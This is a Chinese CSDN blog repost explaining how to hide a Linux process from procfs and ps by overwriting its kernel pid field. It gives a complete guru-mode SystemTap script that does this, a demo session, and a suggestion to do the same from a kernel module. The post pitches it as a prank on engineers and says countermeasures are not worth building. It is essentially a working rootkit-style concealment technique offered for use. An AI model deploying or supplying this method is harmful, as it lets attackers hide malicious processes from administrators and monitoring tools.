作者 | dog250

责编 | 王晓曼

头图 | CSDN 下载自东方IC

出品 | CSDN 博客

总有朋友问隐藏Linux进程的方法,我说你想隐藏到什么程度,是大隐于内核,还是小隐于用户。

网上通篇论述的无外乎 hook 掉 procfs 或者类似的用户态方案,也都难免长篇大论,我说,这些场面都太大了,太复杂了。对于希望马上看到效果的而言,看到这么一堆复杂的东西,大概率望而却步。

本文介绍一种将Linux进程小隐于用户的非常规方法,仅仅一行代码:

修改掉进程的pid即可。

注意是小隐,所以,不值得反制,逗一下高级会议工程师搞个恶作剧玩玩得了。

target->pid = 0x7fffffff;

完整的脚本如下:

#!/usr/bin/stap -g
# hide.stp

global pid;

function hide(who:long)
%{
    struct task_struct *target;

    target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
    target->pid = 0x7fffffff;
%}

probe begin
{
    pid = $1
    hide(pid);
    exit();
}
ff;

来来来,试一下:

[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp
[root@localhost system]# 

用下面的命令可以检测所有可显示进程的二进制文件:

for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do 
    ls -l /proc/$pid/exe; 
done

procfs里没了,ps当然就检测不到了。

如果你觉得 guru 模式的 stap 怪怪的,那么你完全可以编写自己独立的 Linux kernel module,采用修改完即退的方法:

target->pid = xxxx;
return -1;是不是比各种hook法简单多了,所谓的动数据而不要动代码!

是不是比各种 hook 法简单多了,所谓的动数据而不要动代码!

简单的说一下原理:

  • task被创建的时候,根据其pid注册procfs目录结构。

  • 展示procfs目录结构的时候,遍历task list以其pid作为key来查找procfs目录结构。

  • 0x7fffffff(或者任何其它合理的值)根本没有注册过,当然无法显示。

不多说。

再次声明,不要试图对本文所描述的方法进行反制,因为这么简单的东西根本不值得反制,哈哈,不是吗?

可以参考我之前的 Rootkit 系列文章来继续研究 Linux 进程大隐于内核的方法。同时,每一种方法我都给出了反制措施。

自己和自己下棋的本来就不多,我想试试。

声明:本文为 CSDN 博主「dog250」的原创文章,版权归作者所有。

原文:https://blog.csdn.net/dog250/article/details/108032383


更多精彩推荐
☞Java 二十五载,正在 Kotlin 化!
☞国产芯回忆录:造光刻的去卖早点,搞 EDA 的去组装电脑
☞连按 5 次 Shift 重改 CMD 和密码并重启电脑,这个漏洞你不能不知道!
☞维度爆炸?Python实现数据压缩如此简单
☞征战云时代,为什么安全是关键命题?
☞出海、拆分、集成公链,“国家队区块链选手”BSN在下一盘怎样的棋?
点分享点点赞点在看
Logo

20年前,《新程序员》创刊时,我们的心愿是全面关注程序员成长,中国将拥有新一代世界级的程序员。20年后的今天,我们有了新的使命:助力中国IT技术人成长,成就一亿技术人!

更多推荐